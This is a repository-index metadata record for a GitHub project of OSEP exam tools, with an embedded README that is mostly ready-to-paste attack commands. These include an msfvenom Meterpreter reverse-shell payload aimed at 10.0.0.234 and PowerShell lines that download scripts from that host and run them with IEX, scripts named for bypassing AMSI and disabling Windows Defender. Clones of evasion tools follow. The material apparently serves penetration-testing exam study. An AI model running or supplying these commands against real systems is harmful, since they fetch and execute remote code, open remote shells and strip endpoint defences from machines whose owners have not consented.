{"id":19765799,"url":"https://github.com/tapxworld/osep_tools","last_synced_at":"2026-05-07T16:14:50.834Z","repository":{"id":64901271,"uuid":"579292958","full_name":"TapXWorld/osep_tools","owner":"TapXWorld","description":"some command tools for OSEP exam","archived":false,"fork":false,"pushed_at":"2023-01-23T15:15:52.000Z","size":5499,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-01-11T00:12:46.610Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/TapXWorld.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-12-17T07:45:18.000Z","updated_at":"2024-07-01T11:05:42.000Z","dependencies_parsed_at":"2023-02-13T00:16:21.871Z","dependency_job_id":null,"html_url":"https://github.com/TapXWorld/osep_tools","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TapXWorld%2Fosep_tools","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TapXWorld%2Fosep_tools/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TapXWorld%2Fosep_tools/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TapXWorld%2Fosep_tools/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/TapXWorld","download_url":"https://codeload.github.com/TapXWorld/osep_tools/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":241096361,"owners_count":19908969,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-12T04:19:28.455Z","updated_at":"2026-05-07T16:14:50.827Z","avatar_url":"https://github.com/TapXWorld.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# OSEP \nthis repository modified based on from `https://github.com/In3x0rabl3/OSEP`\n\n# Summary\n\nThis repository will refresh your memory when taking the OSEP exam. \n\u003cbr\u003e\nThank you, to everyone who's code was used in this repository.\n\n\n# Table of Contents\n- [OSEP_Reference](https://github.com/In3x0rabl3/OSEP/blob/main/osep_reference.md)\n- [OSEP_Checklist](https://github.com/In3x0rabl3/OSEP/blob/main/osep_checklistv2.md)\n- [OSEP_Payloads](https://github.com/In3x0rabl3/OSEP/tree/main/Payloads)\n- [OSEP_Bypass_Defender](https://github.com/In3x0rabl3/OSEP/tree/main/Bypass_Defender)\n- [OSEP_Lateral_Movement](https://github.com/In3x0rabl3/OSEP/tree/main/Lateral_Movement)\n- [OSEP_MSSQL](https://github.com/In3x0rabl3/OSEP/tree/main/MSSQL)\n\n\n# OneKey Bypass Powershell And Get Shell\n```\nmsfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.234 LPORT=443 -f ps1\n(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/msfvenom_bin/bypass_Ams1_getShell.ps1') | IEX;\n```\n# OneKey Bypass Posershell AMSI\n```\n(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/bypass_defender/bypassAms1.ps1') | IEX;\n```\n\n# OneKey Disable Windows Defender\n```\n(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/bypass_defender/DefendersDeath.ps1') | IEX;\n(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/bypass_defender/DisableDefender.ps1') | IEX;\n+ (need administrator priviledge)\n```\n\n# Other\n```\ngit clone https://github.com/andrew-d/static-binaries.git\ngit clone https://github.com/optiv/Freeze\ngit clone https://github.com/noraj/OSCP-Exam-Report-Template-Markdown\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftapxworld%2Fosep_tools","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftapxworld%2Fosep_tools","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftapxworld%2Fosep_tools/lists"}